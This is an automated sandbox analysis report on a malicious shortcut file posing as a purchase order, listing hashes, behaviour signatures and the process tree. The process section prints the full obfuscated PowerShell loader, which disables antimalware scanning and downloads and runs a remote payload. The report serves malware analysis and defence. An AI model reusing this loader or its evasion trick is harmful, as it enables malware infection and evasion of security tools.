Analysis
-
max time kernel
21s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-12-2024 05:28
Static task
static1
Behavioral task
behavioral1
Sample
INV-7182234 PDF.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
INV-7182234 PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Purchase order 76353 ALtan.lnk
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Purchase order 76353 ALtan.lnk
Resource
win10v2004-20241007-en
General
-
Target
Purchase order 76353 ALtan.lnk
-
Size
3KB
-
MD5
b4595b72f1d67c6062fd286be15aebd4
-
SHA1
87c2b6d575baa07f4d13a3332c8858983dbc3284
-
SHA256
55756cbf17c39876ec3bb2ca836ea9b55741622aafd3237d9ef2e971502d0d29
-
SHA512
16bd5d57e5e83d3f5f7202744063c6d7c05be69425b6758997c2f53c893d720809fb793639f7dde9451c3c3c1f409de8e3d4ebe0861bfd7740491cf74137a1b9
Malware Config
Signatures
-
pid Process 2864 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2864 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2864 2248 cmd.exe 31 PID 2248 wrote to memory of 2864 2248 cmd.exe 31 PID 2248 wrote to memory of 2864 2248 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Purchase order 76353 ALtan.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -WindowStyle 1 $na='';function mdpoig($yb){$rx=[Text.StringBuilder]::New();$od=11;for($eb=0;$eb -lt $yb.Length;$eb+=2){$qq=-join($yb.Substring($eb,2)[1,0]);[void]$rx.Append([char]([System.Convert]::ToUInt16($qq,16)+$od));};return $rx.ToString();};$ct=mdpoig '84E68696A5263224653665C5A526A536963263A69646266596E5463632632686E5A496E51686';$ww=mdpoig '652686E5E336E596B365E516A595';$zu=mdpoig '34463654A67516E5851284966596E585';try{[Ref].Assembly.GetType($ct).GetField($ww,$zu).SetValue($Null,$True)}catch{};;$dy='XEWIOIXVKWMS';sal xmd ($dy[3,1,0] -join(''));$dd=mdpoig 'D596965686F24242C6C6C632066516E556A516A68622756536F5657636A5C56576653295A5866532E59542B6A53695467642D5962616725695B5424585166586864246A6962262C2C2D2C2A26252D2523275E536';$is=[Net.WebRequest]::Create($dd);$nf=$is.GetResponse();$zd=$nf.GetResponseStream();$px=[IO.StreamReader]::New($zd);$du=$px.ReadToEnd() -replace '\r*\n','';xmd((mdpoig $du));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-